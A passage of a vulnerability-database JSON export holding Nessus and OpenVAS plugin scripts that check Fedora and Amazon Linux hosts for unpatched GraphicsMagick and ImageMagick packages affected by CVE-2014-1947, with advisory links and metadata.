attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd013851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"GraphicsMagick-1.3.20-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "title": "Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:23"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "0781303a5610f358747f8fabaa6e72fc"}, {"key": "cvelist", "hash": "eb10e08fe1540f4f9f5e1265ef4130a4"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "a1fb36120e0e8d6655c4ecf449e374cc"}, {"key": "href", "hash": "a74da1f212f8bf92a2acb970ecba4db2"}, {"key": "modified", "hash": "cdfdd3bde3a2886722003d7eda0e3101"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "92aac71407b860a9e44db4b8e2d91f8a"}, {"key": "published", "hash": "4ef4a98ca2233167e1dea982a0983927"}, {"key": "references", "hash": "8f7c0244c4439157edc29ca5cefd932a"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "7fdc0f4fd092ba3e1ae60ca5347a5507"}, {"key": "title", "hash": "ecf51dfa964f1eb29adbc629a2f37624"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "af526322a90b7e8bb5441fc52a59c9a0a6efa574ba4df0cd0909b0bf8a513a35", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310120182", "OPENVAS:1361412562310868136", "OPENVAS:1361412562310868172", "OPENVAS:1361412562310868184", "OPENVAS:867698", "OPENVAS:1361412562310867698", "OPENVAS:702898", "OPENVAS:1361412562310702898", "OPENVAS:1361412562310120052", "OPENVAS:1361412562310121184"]}, {"type": "nessus", "idList": ["FEDORA_2014-9596.NASL", "FEDORA_2014-14617.NASL", "FEDORA_2014-9927.NASL", "IMAGEMAGICK_6_8_7_6.NASL", "SUSE_11_IMAGEMAGICK-140307.NASL", "ALA_ALAS-2014-420.NASL", "FEDORA_2014-4969.NASL", "SOLARIS11_IMAGEMAGICK_20140731.NASL", "ALA_ALAS-2014-336.NASL", "DEBIAN_DSA-2898.NASL"]}, {"type": "amazon", "idList": ["ALAS-2014-420", "ALAS-2014-336"]}, {"type": "seebug", "idList": ["SSV:61456", "SSV:85003"]}, {"type": "zdt", "idList": ["1337DAY-ID-21901"]}, {"type": "exploitdb", "idList": ["EDB-ID:31688"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2898-1:75ACF"]}, {"type": "gentoo", "idList": ["GLSA-201405-09"]}], "modified": "2019-02-21T01:22:24"}, "score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9624.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77678);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9624\");\n\n script_name(english:\"Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#august-16-2014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd013851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"GraphicsMagick-1.3.20-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "77678", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:GraphicsMagick"], "scheme": null}
{"openvas": [{"lastseen": "2018-10-02T14:32:31", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120182", "title": "Amazon Linux Local Check: ALAS-2014-420", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-420.nasl 6759 2017-07-19 09:56:33Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120182\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:19:24 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-420\");\n script_tag(name:\"insight\", value:\"A buffer overflow flaw affecting ImageMagick and GraphicsMagic when handling PSD images was reported.\");\n script_tag(name:\"solution\", value:\"Run yum update GraphicsMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-420.html\");\n script_cve_id(\"CVE-2014-1947\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"GraphicsMagick-debuginfo\", rpm:\"GraphicsMagick-debuginfo~1.3.20~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.20~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"GraphicsMagick-devel\", rpm:\"GraphicsMagick-devel~1.3.20~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"GraphicsMagick-c++\", rpm:\"GraphicsMagick-c++~1.3.20~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"GraphicsMagick-c++-devel\", rpm:\"GraphicsMagick-c++-devel~1.3.20~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"GraphicsMagick-doc\", rpm:\"GraphicsMagick-doc~1.3.20~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-09T11:12:01", "bulletinFamily": "scanner", "description": "Check for the Version of GraphicsMagick", "modified": "2018-04-06T00:00:00", "published": "2014-08-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868136", "id": "OPENVAS:1361412562310868136", "title": "Fedora Update for GraphicsMagick FEDORA-2014-9596", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for GraphicsMagick FEDORA-2014-9596\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868136\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-29 05:51:38 +0200 (Fri, 29 Aug 2014)\");\n script_cve_id(\"CVE-2014-1947\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2014-9596\");\n\n tag_insight = \"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\n\";\n\n tag_affected = \"GraphicsMagick on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-9596\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137120.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of GraphicsMagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.20~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-09T11:13:45", "bulletinFamily": "scanner", "description": "Check for the Version of GraphicsMagick", "modified": "2018-04-06T00:00:00", "published": "2014-09-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868172", "id": "OPENVAS:1361412562310868172", "title": "Fedora Update for GraphicsMagick FEDORA-2014-9927", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for GraphicsMagick FEDORA-2014-9927\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868172\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-10 06:18:51 +0200 (Wed, 10 Sep 2014)\");\n script_cve_id(\"CVE-2014-1947\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2014-9927\");\n script_tag(name: \"insight\", value: \"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\n\");\n script_tag(name: \"affected\", value: \"GraphicsMagick on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"FEDORA\", value: \"2014-9927\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137362.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of GraphicsMagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\nexit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.20~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-09T11:13:32", "bulletinFamily": "scanner", "description": "Check for the Version of GraphicsMagick", "modified": "2018-04-06T00:00:00", "published": "2014-09-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868184", "id": "OPENVAS:1361412562310868184", "title": "Fedora Update for GraphicsMagick FEDORA-2014-9624", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for GraphicsMagick FEDORA-2014-9624\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868184\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-14 05:54:30 +0200 (Sun, 14 Sep 2014)\");\n script_cve_id(\"CVE-2014-1947\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2014-9624\");\n script_tag(name: \"insight\", value: \"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\n\");\n script_tag(name: \"affected\", value: \"GraphicsMagick on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"FEDORA\", value: \"2014-9624\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of GraphicsMagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.20~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-07-25T10:48:31", "bulletinFamily": "scanner", "description": "Check for the Version of ImageMagick", "modified": "2017-07-10T00:00:00", "published": "2014-04-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867698", "id": "OPENVAS:867698", "title": "Fedora Update for ImageMagick FEDORA-2014-4969", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ImageMagick FEDORA-2014-4969\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867698);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-16 11:22:36 +0530 (Wed, 16 Apr 2014)\");\n script_cve_id(\"CVE-2014-1958\", \"CVE-2014-1947\", \"CVE-2014-2030\");\n script_tag(name:\"cvss_base\", value:\"6.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:S/C:C/I:C/A:C\");\n script_name(\"Fedora Update for ImageMagick FEDORA-2014-4969\");\n\n tag_insight = \"ImageMagick is an image display and manipulation tool for the X\nWindow System. ImageMagick can read and write JPEG, TIFF, PNM, GIF,\nand Photo CD image formats. It can resize, rotate, sharpen, color\nreduce, or add special effects to an image, and when finished you can\neither save the completed work in the original format or a different\none. ImageMagick also includes command line programs for creating\nanimated or transparent .gifs, creating composite images, creating\nthumbnail images, and more.\n\nImageMagick is one of your choices if you need a program to manipulate\nand display images. If you want to develop your own applications\nwhich use ImageMagick code or APIs, you need to install\nImageMagick-devel as well.\n\";\n\n tag_affected = \"ImageMagick on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4969\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131475.html\");\n script_summary(\"Check for the Version of ImageMagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.6.3~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-09T11:12:09", "bulletinFamily": "scanner", "description": "Check for the Version of ImageMagick", "modified": "2018-04-06T00:00:00", "published": "2014-04-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867698", "id": "OPENVAS:1361412562310867698", "title": "Fedora Update for ImageMagick FEDORA-2014-4969", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ImageMagick FEDORA-2014-4969\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867698\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-16 11:22:36 +0530 (Wed, 16 Apr 